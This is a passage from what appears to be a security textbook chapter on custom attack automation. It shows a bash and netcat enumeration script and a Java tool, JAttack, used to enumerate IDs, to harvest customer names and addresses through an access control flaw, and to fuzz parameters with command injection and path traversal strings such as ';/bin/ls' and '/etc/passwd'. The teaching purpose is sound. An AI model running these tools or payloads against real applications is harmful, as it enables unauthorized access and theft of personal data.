vary, and the overall response length is changeable due to the inclusion of

dynamic content, searching responses for a specific string or pattern may be

the most reliable means of identifying hits.

Location Header

In some cases, the application will respond to every request for a particular
URL with an HTTP redirect (a 302 status code), where the target of the
redirection depends upon the parameters submitted in the request. For
example, a request to view a report might result in a redirect to
/download.jsp if the supplied report name is correct, or to /error.jsp if it
is incorrect. The target of an HTTP redirect is specified in the Location
header, and can often be used as a way of identifying hits.

Set-Cookie Header

Occasionally, the application may respond in an identical way to any set of

parameters, with the exception that a cookie is set in certain cases. For exam-

ple, every login request might be met with the same redirect, but in the case of

valid credentials, the application sets a cookie containing a session token. The

content that the client receives when it follows the redirect will depend on

whether a valid session token is submitted.
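Both header-based indicators can be checked with very little code. The following is a minimal sketch rather than part of any tool described in this chapter: the class name HeaderIndicators and its method are hypothetical, and it assumes that the raw response is available as a single string with its line breaks intact.

```java
// Hypothetical helper (an illustration only): extracts header-based hit
// indicators from a raw HTTP response held in a single string.
class HeaderIndicators
{
    // Returns the value of the first header with the given name
    // (case-insensitive), or null if the header is absent.
    static String headerValue(String rawResponse, String name)
    {
        String[] lines = rawResponse.split("\r?\n");
        // Start at 1 to skip the status line; stop at the blank line
        // that separates the headers from the body.
        for (int i = 1; i < lines.length && !lines[i].isEmpty(); i++)
        {
            int colon = lines[i].indexOf(':');
            if (colon > 0 && lines[i].substring(0, colon).trim().equalsIgnoreCase(name))
                return lines[i].substring(colon + 1).trim();
        }
        return null;
    }

    public static void main(String[] args)
    {
        // Made-up responses modeled on the redirect examples in the text
        String hit = "HTTP/1.0 302 Found\r\nLocation: /download.jsp\r\n"
                + "Set-Cookie: SessionId=21298FE012EEA892981\r\n\r\n";
        String miss = "HTTP/1.0 302 Found\r\nLocation: /error.jsp\r\n\r\n";
        System.out.println("Redirect target: " + headerValue(hit, "Location"));
        System.out.println("Cookie set on miss: " + (headerValue(miss, "Set-Cookie") != null));
    }
}
```

A hit can then be recognized either by comparing the Location value against the known error page or by testing whether a Set-Cookie header is present at all.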

Time Delays

Occasionally, the actual contents of the server’s response may be identical

when valid and invalid parameters are submitted, but the time taken to return

the response may differ subtly. For example, when an invalid username is sub-

mitted to a login function, the application may respond immediately with a

generic, uninformative message. However, when a valid username is submit-

ted, the application may perform various back-end processing to validate the

supplied credentials, some of which is computationally intensive, before

returning the same message if the credentials are incorrect. If you can detect

this time difference remotely, then it can be used as a discriminator to identify

hits in your attack. (This bug is also often found in other types of software,

such as older versions of OpenSSH.)
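Because a single measurement is easily distorted by network jitter, a timing discriminator is usually more dependable when each candidate is measured several times. The sketch below illustrates one way to do this, under stated assumptions: the TimingProbe class, its Probe interface, and the choice of the median and a fixed margin are all hypothetical, and Probe stands in for whatever code actually issues the request.

```java
import java.util.Arrays;

// Hypothetical timing helper (an illustration only).
class TimingProbe
{
    // Stands in for the code that issues one request for a given value.
    // A real implementation would wrap any I/O errors it encounters.
    interface Probe
    {
        void send(String value);
    }

    // Median elapsed time, in milliseconds, over several repetitions.
    // The median is less sensitive to one-off delays than the mean.
    static long medianMillis(Probe probe, String value, int repetitions)
    {
        long[] samples = new long[repetitions];
        for (int i = 0; i < repetitions; i++)
        {
            long start = System.nanoTime();
            probe.send(value);
            samples[i] = (System.nanoTime() - start) / 1000000L;
        }
        Arrays.sort(samples);
        return samples[repetitions / 2];
    }

    // Treats a candidate as a likely hit if its median time exceeds the
    // baseline (measured for a known-invalid value) by more than a margin.
    static boolean looksLikeHit(long baselineMillis, long candidateMillis, long marginMillis)
    {
        return candidateMillis - baselineMillis > marginMillis;
    }
}
```

The margin has to be chosen empirically for each target; if the difference between valid and invalid values is smaller than the normal variation in response times, this indicator is not usable.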

TIP The primary objective in selecting indicators of hits is to find one that is

completely reliable or a group that are reliable when taken together. However,

in some attacks, you may not know in advance exactly what a hit looks like. For

example, when targeting a login function to try and enumerate usernames, you

may not actually possess a known valid username in order to determine the

application’s behavior in the case of a hit. In this situation, the best approach is

to monitor the application’s responses for all of the attributes just described

and to look for any anomalies in these.
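When you do not know what a hit looks like, one simple way to look for anomalies is to group the responses by a coarse fingerprint and review the groups that occur rarely. The following sketch assumes that the status code and length of each response have already been recorded; the AnomalyFinder class and its method are hypothetical names used only for illustration.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Hypothetical helper (an illustration only): groups responses by a
// "status/length" fingerprint so that rare combinations stand out.
class AnomalyFinder
{
    // payloads[i] produced a response with statuses[i] and lengths[i].
    // Returns the payloads whose fingerprint occurred at most maxCount times.
    static List<String> rarePayloads(String[] payloads, int[] statuses,
            int[] lengths, int maxCount)
    {
        // First pass: count how often each fingerprint occurs
        Map<String, Integer> counts = new HashMap<String, Integer>();
        for (int i = 0; i < payloads.length; i++)
        {
            String key = statuses[i] + "/" + lengths[i];
            Integer seen = counts.get(key);
            counts.put(key, seen == null ? 1 : seen + 1);
        }

        // Second pass: keep the payloads whose fingerprint is rare
        List<String> rare = new ArrayList<String>();
        for (int i = 0; i < payloads.length; i++)
            if (counts.get(statuses[i] + "/" + lengths[i]) <= maxCount)
                rare.add(payloads[i]);
        return rare;
    }
}
```

This works best when misses produce identical responses. If the response length varies because of dynamic content, the fingerprint would need to be coarser, for example the status code alone.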

Scripting the Attack

Let’s suppose that we have identified the following URL, which returns a 200
response code when a valid docID value is submitted, and a 500 response code
otherwise:

http://wahh-app.com/ShowDoc.jsp?docID=3801

This request/response pair satisfies the two conditions required for you to

be able to mount an automated attack to enumerate valid document IDs.

In a simple case such as this, it is possible to create a custom script very
quickly to perform an automated attack. For example, the following bash
script reads a list of potential document IDs from stdin, uses the netcat tool
to request a URL containing each ID, and logs the first line of the server’s
response, which contains the HTTP status code:

#!/bin/bash

server=wahh-app.com
port=80

# read candidate document IDs from stdin, one per line
while read id
do
    echo -ne "$id\t"
    # request the document and keep only the status line of the response
    echo -ne "GET /ShowDoc.jsp?docID=$id HTTP/1.0\r\nHost: $server\r\n\r\n" \
        | netcat $server $port | head -1
done | tee outputfile

Running this script with a suitable input file generates the following output,

which enables you to quickly identify valid document IDs:

~> ./script <IDs.txt

3000 HTTP/1.0 500 Internal Server Error

3001 HTTP/1.0 200 Ok

3002 HTTP/1.0 200 Ok

3003 HTTP/1.0 500 Internal Server Error

...

TIP The Cygwin environment can be used to execute bash scripts on the

Windows platform. Also, the UnxUtils suite contains Win32 ports of numerous

useful GNU utilities such as head and grep.

You can achieve the same result just as easily on Windows. The following
example, entered at the command prompt, uses the curl tool to generate
requests and the findstr command to filter the output (within a batch file,
write the loop variable as %%i rather than %i):

for /f "tokens=1" %i in (IDs.txt) do echo %i && curl wahh-app.com/ShowDoc.jsp?docID=%i -i -s | findstr /B HTTP/

While simple scripts like these are ideal for performing a straightforward

task like cycling through a list of parameter values and parsing the server’s

response for a single attribute, in many situations you are likely to require

more power and flexibility than command-line scripting can readily offer. The

authors’ preference is to use a suitable high-level object-orientated language

that enables easy manipulation of string-based data and provides accessible

APIs for using sockets and SSL. Languages that satisfy these criteria include

Java, C#, and Python. We will look in more depth at an example using Java.

JAttack

JAttack is a simple but versatile tool that demonstrates how anyone with some
basic programming knowledge can use bespoke automation to deliver very
powerful attacks against an application. The full source code for this tool can
be downloaded from this book’s companion web site (www.wiley.com/go/webhacker).
More important than the actual code, however, are the basic techniques
involved, which we will explain shortly.

Rather than just working with a request as an unstructured block of text, we
need the tool to understand the concept of a request parameter: that is, a
named item of data that can be manipulated and is attached to a request in a
particular way. Request parameters may appear in the URL query string,
HTTP cookies, or the body of a POST request. Let’s start by creating a Param
class to hold the relevant details:

// JAttack.java
// by Dafydd Stuttard

import java.net.*;
import java.io.*;

class Param
{
    String name, value;
    Type type;
    boolean attack;

    Param(String name, String value, Type type, boolean attack)
    {
        this.name = name;
        this.value = value;
        this.type = type;
        this.attack = attack;
    }

    enum Type
    {
        URL, COOKIE, BODY
    }
}

In many situations, a request will contain parameters that we do not wish to

modify in a given attack, but that we still need to include for the attack to suc-

ceed. We can use the “attack” field to flag whether a given parameter is being

subjected to modification in the current attack.

In order to modify the value of a selected parameter in crafted ways, we

need our tool to understand the concept of an attack payload. In different

types of attack, we will need to create different payload sources. Let’s build

some flexibility into the tool up front, and create an interface that all payload

sources must implement:

interface PayloadSource
{
    boolean nextPayload();
    void reset();
    String getPayload();
}

The nextPayload method can be used to advance the state of the source, and
returns true until all of its payloads are used up. The reset method returns
the state to its initial point. The getPayload method returns the value of the
current payload.

In the document enumeration example, the parameter we want to vary contains
a numeric value, and so our first implementation of the PayloadSource
interface is a class to generate numeric payloads. This class allows us to
specify the range of numbers that we want to test:

class PSNumbers implements PayloadSource
{
    int from, to, step, current;

    PSNumbers(int from, int to, int step)
    {
        this.from = from;
        this.to = to;
        this.step = step;
        reset();
    }

    public boolean nextPayload()
    {
        current += step;
        return current <= to;
    }

    public void reset()
    {
        // start one step before the range so that the first call to
        // nextPayload() yields "from"
        current = from - step;
    }

    public String getPayload()
    {
        return Integer.toString(current);
    }
}
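The same interface accommodates attacks that work through a list of candidate values rather than a numeric range, such as a list of common usernames. The following is a minimal sketch of such a source. The PSList class is hypothetical and is offered only to illustrate how the interface might be implemented for list-based payloads.

```java
// Copied from the listing above so that this sketch compiles on its own.
interface PayloadSource
{
    boolean nextPayload();
    void reset();
    String getPayload();
}

// Hypothetical payload source (an illustration only) that works through
// a fixed list of candidate values.
class PSList implements PayloadSource
{
    private final String[] values;
    private int current;

    PSList(String... values)
    {
        this.values = values;
        reset();
    }

    public boolean nextPayload()
    {
        // advance, and report whether a payload is available at the new position
        current++;
        return current < values.length;
    }

    public void reset()
    {
        // position before the first value, mirroring PSNumbers
        current = -1;
    }

    public String getPayload()
    {
        return values[current];
    }
}
```

As with the numeric source, getPayload should be called only after nextPayload has returned true.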

Equipped with the concept of a request parameter and a payload source, we

have sufficient resources to generate actual requests and process the server’s

responses. First, let’s specify some configuration for our first attack:

class JAttack
{
    // attack config
    String host = "wahh-app.com";
    int port = 80;
    String method = "GET";
    String url = "/ShowDoc.jsp";
    Param[] params = new Param[]
    {
        new Param("DocID", "3801", Param.Type.URL, true),
    };
    PayloadSource payloads = new PSNumbers(3000, 3100, 1);

This configuration includes the basic target information, creates a single
request parameter called DocID, and configures our numeric payload source to
cycle through the range 3000–3100.

In order to cycle through a series of requests, potentially targeting multiple
parameters, we’ll need to maintain some state. Let’s use a simple nextRequest
method to advance the state of our request engine, returning true until there
are no more requests remaining:

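    // attack state
    int currentParam = 0;

    boolean nextRequest()
    {
        // all parameters have been processed
        if (currentParam >= params.length)
            return false;

        // skip parameters that are not flagged for attack
        if (!params[currentParam].attack)
        {
            currentParam++;
            return nextRequest();
        }

        // payloads exhausted for this parameter; move on to the next one
        if (!payloads.nextPayload())
        {
            payloads.reset();
            currentParam++;
            return nextRequest();
        }

        return true;
    }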

This stateful request engine will keep track of which parameter we are cur-

rently targeting, and which attack payload to place into it. The next step is to

actually build a complete HTTP request using this information. This involves

inserting each type of parameter into the correct place in the request, and

adding any other required headers:

    String buildRequest()
    {
        // build parameters
        StringBuffer urlParams = new StringBuffer();
        StringBuffer cookieParams = new StringBuffer();
        StringBuffer bodyParams = new StringBuffer();

        for (int i = 0; i < params.length; i++)
        {
            // the targeted parameter takes the current payload;
            // all others keep their base value
            String value = (i == currentParam) ?
                    payloads.getPayload() :
                    params[i].value;

            if (params[i].type == Param.Type.URL)
                urlParams.append(params[i].name + "=" + value + "&");
            else if (params[i].type == Param.Type.COOKIE)
                cookieParams.append(params[i].name + "=" + value + "; ");
            else if (params[i].type == Param.Type.BODY)
                bodyParams.append(params[i].name + "=" + value + "&");
        }

        // build request
        StringBuffer req = new StringBuffer();
        req.append(method + " " + url);
        if (urlParams.length() > 0)
            req.append("?" + urlParams.substring(0, urlParams.length() - 1));
        req.append(" HTTP/1.0\r\nHost: " + host);
        if (cookieParams.length() > 0)
            req.append("\r\nCookie: " + cookieParams.toString());
        if (bodyParams.length() > 0)
        {
            // the trailing "&" is dropped from the body, hence length() - 1
            req.append("\r\nContent-Type: application/x-www-form-urlencoded");
            req.append("\r\nContent-Length: " + (bodyParams.length() - 1));
            req.append("\r\n\r\n");
            req.append(bodyParams.substring(0, bodyParams.length() - 1));
        }
        else req.append("\r\n\r\n");

        return req.toString();
    }

NOTE If you write your own code to generate POST requests, you will need to

include a valid Content-Length header that specifies the actual length of the

HTTP body in each request, as in the preceding code. If an invalid Content-

Length is submitted, most web servers will either truncate the data you submit

or wait indefinitely for more data to be supplied.
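One detail worth keeping in mind is that Content-Length counts bytes on the wire, not characters. For a body consisting only of ASCII characters the two are the same, but they diverge as soon as a payload contains other characters. The sketch below shows one way to compute the length from the encoded body. The ContentLengthDemo class is hypothetical, and the use of UTF-8 is an assumption; the appropriate encoding depends on the target application.

```java
import java.nio.charset.StandardCharsets;

// Hypothetical helper (an illustration only).
class ContentLengthDemo
{
    // Encodes the body first and measures the resulting bytes.
    // UTF-8 is an assumption here, not a property of any particular server.
    static int contentLength(String body)
    {
        return body.getBytes(StandardCharsets.UTF_8).length;
    }

    public static void main(String[] args)
    {
        String ascii = "docID=3801";
        String accented = "name=caf\u00e9";   // final character needs two bytes in UTF-8
        System.out.println(ascii.length() + " chars, " + contentLength(ascii) + " bytes");
        System.out.println(accented.length() + " chars, " + contentLength(accented) + " bytes");
    }
}
```

If a request is built this way, the same encoding must also be used when the request is written to the socket, so that the declared and actual lengths agree.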

In order to send our requests, we need to open network connections to the

target web server. Java makes the task of opening a TCP connection, submit-

ting data, and reading the server’s response extremely easy:

    String issueRequest(String req) throws UnknownHostException, IOException
    {
        Socket socket = new Socket(host, port);
        OutputStream os = socket.getOutputStream();
        os.write(req.getBytes());
        os.flush();

        BufferedReader br = new BufferedReader(new InputStreamReader(
                socket.getInputStream()));
        StringBuffer response = new StringBuffer();
        String line;
        // note: readLine() strips line terminators, so the stored
        // response omits them
        while (null != (line = br.readLine()))
            response.append(line);

        os.close();
        br.close();
        return response.toString();
    }

Having obtained the server’s response to each request, we need to parse it

to extract the relevant information to enable us to identify hits in our attack.

Let’s start by simply recording two interesting items — the HTTP status code

from the first line of the response and the total length of the response:

    String parseResponse(String response)
    {
        StringBuffer output = new StringBuffer();

        // the second whitespace-delimited token of the response is the status code
        output.append(response.split("\\s+", 3)[1] + "\t");
        output.append(Integer.toString(response.length()) + "\t");

        return output.toString();
    }

Finally, we now have everything in place to launch our attack. We just need
some simple wrapper code to call each of the preceding methods in turn and
print out the results, until all our requests have been made and nextRequest
returns false:

    void doAttack()
    {
        System.out.println("param\tpayload\tstatus\tlength");
        String output = null;

        while (nextRequest())
        {
            try
            {
                output = parseResponse(issueRequest(buildRequest()));
            }
            catch (Exception e)
            {
                output = e.toString();
            }
            System.out.println(params[currentParam].name + "\t" +
                    payloads.getPayload() + "\t" + output);
        }
    }

    public static void main(String[] args)
    {
        new JAttack().doAttack();
    }
}

That’s it! To compile and run this code, you will need to download the Java

SDK and JRE from Sun, and then execute the following:

> javac JAttack.java

> java JAttack

In our example configuration, the tool’s output is:

param payload status length

DocID 3000 500 220

DocID 3001 200 48179

DocID 3002 200 62881

DocID 3003 500 220

...

Assuming a normal network connection and amount of processing power,

JAttack is capable of issuing hundreds of individual requests per minute and

outputting the pertinent details, enabling you to very quickly identify valid

document identifiers for further investigation.

It may appear that the attack just illustrated is no more sophisticated than

the original bash script example, which required only a few lines of code.

However, because of the way JAttack is engineered, it is trivial to modify it to

deliver much more sophisticated attacks, incorporating multiple request para-

meters, a variety of different payload sources, and arbitrarily complex pro-

cessing of responses. In the following sections, we will make some minor

additions to JAttack’s code, which make it considerably more powerful.

Harvesting Useful Data

The second main use of bespoke automation when attacking an application is

to extract useful or sensitive data by using specific crafted requests to retrieve

the information one item at a time. This situation most commonly arises when

you have identified an exploitable vulnerability, such as an access control flaw,

that enables you to access an unauthorized resource by specifying an identifier

for it. However, it may also arise when the application is functioning entirely

as intended by its designers. Here are some examples of cases where auto-

mated data harvesting may be useful:

■■

An online retailing application contains a facility for registered cus-

tomers to view their pending orders. However, if you can determine the

order numbers assigned to other customers, then you can view their

order information in just the same way as your own.

■■

A forgotten password function relies upon a user-configurable chal-

lenge. You can submit an arbitrary username and view the associated

challenge. By iterating through a list of enumerated or guessed user-

names, you can obtain a large list of users’ password challenges, to

identify those that are easily guessable.

■■

A workflow application contains a function to display some basic

account information about a given user, including her privilege level

within the application. By iterating through the range of user IDs in

use, you can obtain a listing of all administrative users, which can be

used as the basis for password guessing and other attacks.

The basic approach to using automation to harvest data is essentially simi-

lar to the enumeration of valid identifiers, except that you are now not only

interested in a binary result (i.e., a hit or a miss), but are seeking to extract

some of the content of each response in a usable form.

Consider the following request in an application used by an online retailer,

which displays the details of a specific order, including the personal informa-

tion of the user who made the order:

POST /ShowOrder.jsp HTTP/1.0
Host: wahh-app.com
Cookie: SessionId=21298FE012EEA892981;
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

OrderRef=1003073781&OrderType=retail

Although this application function is accessible only by authenticated users,

there is an access control vulnerability, which means that any user can view the

details of any order. Further, the format used for the OrderRef parameter

appears to be a six-digit date followed by a four-digit number. Assuming that

the last four digits are more-or-less sequential, it should be trivial to predict

other users’ order numbers.

When the details for an order are displayed, the page source contains the

personal data within an HTML table like the following:

<tr>

<td>Name:</td><td>Phill Bellend</td>

</tr>

<tr>

<td>Address:</td><td>52, Throwley Way</td>

</tr>

...

This data could be of huge value to a competitor company or an identity

fraudster. Given the application’s behavior, it is straightforward to mount a

bespoke automated attack to harvest all of the personal customer information

contained within the application.

To do so, let’s make some quick enhancements to the JAttack tool, to enable

it to extract and log specific data from within the server’s responses. First, we

can add to the attack configuration data a list of the strings within the source

code that identify the interesting content we want to extract:

    static final String[] extractStrings = new String[]
    {
        "<td>Name:</td><td>",
        "<td>Address:</td><td>"
    };

Second, we can add the following to the parseResponse method, to search

each response for each of the above strings and extract what comes next, up

until the angle bracket that follows it:

        for (String extract : extractStrings)
        {
            int from = response.indexOf(extract);
            if (from == -1)
                continue;
            from += extract.length();
            int to = response.indexOf("<", from);
            if (to == -1)
                to = response.length();
            output.append(response.subSequence(from, to) + "\t");
        }

That is all we need to change within the tool’s actual code. To configure JAt-

tack to target the actual request in which we are interested, we need to update

its attack configuration as follows:

    String method = "POST";
    String url = "/ShowOrder.jsp";
    Param[] params = new Param[]
    {
        new Param("SessionId", "21298FE012EEA892981", Param.Type.COOKIE, false),
        new Param("OrderRef", "1003073781", Param.Type.BODY, true),
        new Param("OrderType", "retail", Param.Type.BODY, false),
    };
    PayloadSource payloads = new PSNumbers(1003073700, 1003073800, 1);

This configuration instructs JAttack to make POST requests to the relevant

URL, containing the three required parameters. Only one of these will actually

be modified, using the range of potential order numbers specified.

When we now run JAttack, we obtain the following output:

OrderRef 1003073700 500 300

OrderRef 1003073701 500 300

...

OrderRef 1003073773 500 300

OrderRef 1003073774 200 27489 P Orac 13, Fairyland St

OrderRef 1003073775 200 28991 S Hammad 1, Stews Place

OrderRef 1003073776 200 29430 Adam Matthews Flat 12a, G Community

OrderRef 1003073777 200 28224 Mike Kemp 6, Carshalton Rd

OrderRef 1003073778 200 28171 Martin Murfitt Jn15, South Circular

OrderRef 1003073779 200 27880 D Senior The Old Doss House

OrderRef 1003073780 200 28901 Ian Peters Penthouse Suite

OrderRef 1003073781 200 27388 Phill Bellend 52, Throwley Way

OrderRef 1003073782 500 300

OrderRef 1003073783 500 300

...

As you can see, the attack was successful and captured the personal details

of some customers. It appears that when an invalid order number is submit-

ted, the server encounters an error and a 500 response code is returned. It also

appears that none of the order numbers below 1003073774 were valid. This

suggests that only eight orders have been placed today, and the order numbers

we should target are 0903073773 and below. By writing a quick custom pay-

load source for JAttack, we could generate payloads automatically, using the

scheme employed by the application.
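One reason a custom source is needed here is that the numeric source shown earlier stores its values as integers, so a reference such as 0903073773 would lose its leading zero. The following sketch shows what such a payload source might look like. The PSOrderRefs class is hypothetical, and it assumes that each reference is a six-digit date prefix followed by a zero-padded four-digit sequence number that should be tried in descending order; whether the sequence really continues across days would need to be confirmed against the application.

```java
// Copied from the earlier listing so that this sketch compiles on its own.
interface PayloadSource
{
    boolean nextPayload();
    void reset();
    String getPayload();
}

// Hypothetical payload source (an illustration only): a fixed date prefix
// followed by a four-digit sequence number, counting downward.
class PSOrderRefs implements PayloadSource
{
    private final String datePrefix;
    private final int highest, lowest;
    private int current;

    PSOrderRefs(String datePrefix, int highest, int lowest)
    {
        this.datePrefix = datePrefix;
        this.highest = highest;
        this.lowest = lowest;
        reset();
    }

    public boolean nextPayload()
    {
        current--;
        return current >= lowest;
    }

    public void reset()
    {
        // start one above the range so that the first call to
        // nextPayload() yields "highest"
        current = highest + 1;
    }

    public String getPayload()
    {
        // the prefix is kept as a string, which preserves any leading zero
        return datePrefix + String.format("%04d", current);
    }
}
```

Configured as new PSOrderRefs("090307", 3773, 0), this source would work downward from 0903073773, matching the range suggested by the results above.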

TIP Data output in tab-delimited format can be easily loaded into

spreadsheet software such as Excel for further manipulation or tidying up. In

many situations, the output from a data-harvesting exercise can be used as the

input for another automated attack.
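Chaining attacks in this way mostly comes down to filtering the tab-delimited output of one run into the payload list for the next. The sketch below illustrates the idea. The HitFilter class is hypothetical, and it assumes the column order used in this chapter's examples: parameter name, payload, status code, and then length.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical helper (an illustration only): selects payloads from
// tab-delimited attack output according to the recorded status code.
class HitFilter
{
    // Each line is expected to hold at least: param, payload, status.
    // Lines that do not fit this shape, such as a header row, are ignored
    // unless their third column happens to equal the requested status.
    static List<String> payloadsWithStatus(List<String> lines, String status)
    {
        List<String> hits = new ArrayList<String>();
        for (String line : lines)
        {
            String[] cols = line.split("\t");
            if (cols.length >= 3 && cols[2].equals(status))
                hits.add(cols[1]);
        }
        return hits;
    }
}
```

The resulting list could then be supplied to a list-based payload source for a follow-up attack against a different function.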

Fuzzing for Common Vulnerabilities

The third main use of bespoke automation does not involve targeting any

known vulnerability to enumerate or extract information. Rather, your objec-

tive is to probe the application with various crafted attack strings designed to

cause anomalous behavior within the application if particular common vul-

nerabilities are present. This type of attack is much less focused than the ones

previously described, for the following reasons:

■■

It generally involves submitting the same set of attack payloads as

every parameter to every page of the application, regardless of the nor-

mal function of each parameter or the type of data that the application

expects to receive. These payloads are sometimes referred to as fuzz

strings.

■■

You do not know in advance precisely how to identify hits. Rather than

monitoring the application’s responses for a specific indicator of suc-

cess, you generally need to capture as much detail as possible in a clear

form, so that this can be easily reviewed to identify cases where your

attack string has triggered some anomalous behavior within the appli-

cation, which merits further investigation.

As you have seen when examining various common web application flaws,

some vulnerabilities manifest themselves in the application’s behavior in par-

ticular recognizable ways, such as a specific error message or HTTP status

code. These vulnerability signatures can sometimes be relied upon to detect

common defects, and they are the means by which automated application vul-

nerability scanners identify the majority of their findings (see Chapter 19).

However, in principle, any test string you submit to the application may give

rise to unexpected behavior that, in its particular context, points towards the

presence of a vulnerability. For this reason, an experienced attacker using

bespoke automated techniques is usually much more effective than any fully

automated tool can ever be. Such an attacker can perform an intelligent analy-

sis of every pertinent detail of the application’s responses. He can think like an

application designer and developer. And he can spot and investigate unusual

connections between requests and responses in a way that no current tool is

able to.

Using automation to facilitate vulnerability discovery is of particular bene-

fit in a large and complex application containing dozens of dynamic pages,

each of which accepts numerous parameters. Testing every request manually,

and tracking the pertinent details of the application’s responses to related

requests, is a near-impossible task. The only practical way to probe such an

application is to leverage automation to replicate many of the laborious tasks

that you would otherwise need to perform manually.

Consider the following example request, which contains several parameters

of different types:

POST /app/acc/login.jsp?ts=29813&_DARGS=/app/acc/login_assumed.jsp HTTP/1.1
Host: wahh-app.com
Cookie: webabacus_id=131st22418177-1; DYN_USER_ID=100014981; USER_CONFIRM=836de5f76c5ec83; ParkoSearch2007=true; JSESSIONID=DKBHCAOQQWHFFCKTR
Content-Length: 160

_dyncharset=UTF-8&_template=app/inc/templ.jsp&personalDetailsURL=..%2Facc%2Fregister_p1.jsp&login=[email protected]&originalRedirectFromURL=+&password=bestinfw

Suppose that we wish to probe this request for common defects within the

application. As an initial exploration of the attack surface, we decide to submit

the following strings in turn within each parameter:

■ ' : This will generate an error in some instances of SQL injection.

■ ;/bin/ls : This string will cause unexpected behavior in some cases of command injection.

■ ../../../../../etc/passwd : This string will cause a different response in some cases where a path traversal flaw exists.

■ xsstest : If this string is copied into the server’s response then the application may be vulnerable to cross-site scripting.

We can extend the JAttack tool to generate these payloads by creating a new

payload source, as follows:

class PSFuzzStrings implements PayloadSource
{
    // Attack strings submitted in turn within each targeted parameter.
    static final String[] fuzzStrings = new String[]
    {
        "'", ";/bin/ls", "../../../../../etc/passwd", "xsstest"
    };

    // Index of the current payload; -1 means iteration has not started.
    int current = -1;

    // Advances to the next payload; returns false when none remain.
    public boolean nextPayload()
    {
        current++;
        return current < fuzzStrings.length;
    }

    public void reset()
    {
        current = -1;
    }

    public String getPayload()
    {
        return fuzzStrings[current];
    }
}

NOTE Any serious attack to probe the application for security flaws would

need to employ many other attack strings, to identify other weaknesses and

also other variations on the defects previously mentioned. See Chapter 20 for a

more comprehensive list of the strings that are effective when fuzzing a web

application.

To use JAttack for fuzzing, we also need to extend its response analysis

code, to provide more information about each response received from the

application. A simple way to greatly enhance this analysis is to search each

response for a number of common strings and error messages that may indi-

cate that some anomalous behavior has occurred, and record any appearance

within the tool’s output.

First, we can add to the attack configuration data a list of the strings that we

want to search for:

static final String[] grepStrings = new String[]
{
    "error", "exception", "illegal", "invalid", "not found", "xsstest"
};

Second, we can add the following to the parseResponse method, to search

each response for the preceding strings and log any that are found:

for (String grep : grepStrings)
    if (response.indexOf(grep) != -1)
        output.append(grep + "\t");

TIP Incorporating this search functionality into JAttack will frequently prove

useful when enumerating identifiers within the application. It is very common to

find that the most reliable indicator of a hit is the presence or absence of a

specific expression within the application’s response.
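The search step can be sketched as a small self-contained method. The class name ResponseGrep and the method findMatches are hypothetical and are not part of JAttack. The sketch also lowercases the response before searching, which is an assumption made here so that variants such as "Error" are caught as well.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;

// Hypothetical helper, not part of JAttack: reports which indicator
// strings occur in a response.
final class ResponseGrep
{
    static final String[] GREP_STRINGS =
    {
        "error", "exception", "illegal", "invalid", "not found", "xsstest"
    };

    // Returns the indicator strings found in the response, in list order.
    // The comparison is case-insensitive (an assumption of this sketch).
    static List<String> findMatches(String response)
    {
        String haystack = response.toLowerCase(Locale.ROOT);
        List<String> found = new ArrayList<>();
        for (String grep : GREP_STRINGS)
            if (haystack.contains(grep))
                found.add(grep);
        return found;
    }

    public static void main(String[] args)
    {
        String response =
            "HTTP/1.1 500 Internal Server Error\r\n\r\nFile Not Found";
        // Tab-delimited, matching the style of the tool's other output.
        System.out.println(String.join("\t", findMatches(response)));
    }
}
```

Returning a list rather than appending directly to the output keeps the matching logic easy to reuse, for example when sorting or filtering results later.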

This is all we need to do to create a basic web application fuzzer. To deliver

the actual attack, we simply need to configure JAttack with the relevant

request details, instructing it to attack every parameter, as follows:

String method = "POST";
String url = "/app/acc/login.jsp";
Param[] params = new Param[]
{
    new Param("ts", "29813", Param.Type.URL, true),
    new Param("_DARGS",
        "/app/acc/login_assumed.jsp", Param.Type.URL, true),
    new Param("webabacus_id", "131st22418177-1", Param.Type.COOKIE, true),
    new Param("DYN_USER_ID", "100014981", Param.Type.COOKIE, true),
    new Param("USER_CONFIRM", "836de5f76c5ec83", Param.Type.COOKIE, true),
    new Param("ParkoSearch2007", "true", Param.Type.COOKIE, true),
    new Param("JSESSIONID", "DKBHCAOQQWHFFCKTR", Param.Type.COOKIE, true),
    new Param("_dyncharset", "UTF-8", Param.Type.BODY, true),
    new Param("_template", "app/inc/templ.jsp", Param.Type.BODY, true),
    new Param("personalDetailsURL",
        "..%2Facc%2Fregister_p1.jsp", Param.Type.BODY, true),
    new Param("login", "[email protected]", Param.Type.BODY, true),
    new Param("originalRedirectFromURL", "+", Param.Type.BODY, true),
    new Param("password", "bestinfw", Param.Type.BODY, true),
};
PayloadSource payloads = new PSFuzzStrings();

With this configuration in place, we can launch our attack. Within a few sec-

onds, JAttack has submitted each of the attack payloads within each parame-

ter of the request — over 50 requests in all, which would have taken several

minutes at least to issue manually, and far longer to review and analyze the

raw responses received.
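The request count follows directly from the configuration: 13 parameters multiplied by 4 payloads gives 52 requests. As a rough sketch of the order in which a one-parameter-at-a-time run works through them, the following enumerates the (parameter, payload) pairs. The FuzzPlan class is hypothetical and does not issue any requests.

```java
import java.util.ArrayList;
import java.util.List;

// Illustrative only: enumerates the (parameter, payload) pairs that a
// one-parameter-at-a-time fuzzing run would submit.
final class FuzzPlan
{
    static final String[] PARAM_NAMES =
    {
        "ts", "_DARGS", "webabacus_id", "DYN_USER_ID", "USER_CONFIRM",
        "ParkoSearch2007", "JSESSIONID", "_dyncharset", "_template",
        "personalDetailsURL", "login", "originalRedirectFromURL", "password"
    };

    static final String[] FUZZ_STRINGS =
    {
        "'", ";/bin/ls", "../../../../../etc/passwd", "xsstest"
    };

    // Each test case modifies exactly one parameter; every other
    // parameter would keep its original value in the real request.
    static List<String[]> testCases()
    {
        List<String[]> cases = new ArrayList<>();
        for (String param : PARAM_NAMES)
            for (String payload : FUZZ_STRINGS)
                cases.add(new String[] { param, payload });
        return cases;
    }

    public static void main(String[] args)
    {
        System.out.println(testCases().size() + " requests");
    }
}
```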

The next task is to manually inspect the output from JAttack and attempt to

identify any anomalous results that may indicate the presence of a vulnerabil-

ity. Let’s take a look at an extract of the output:

_template           '                          500  498    error  not found
_template           ;/bin/ls                   500  498    error  not found
_template           ../../../../../etc/passwd  200  3987
_template           xsstest                    500  498    error  not found
personalDetailsURL  '                          200  39192
personalDetailsURL  ;/bin/ls                   200  39199
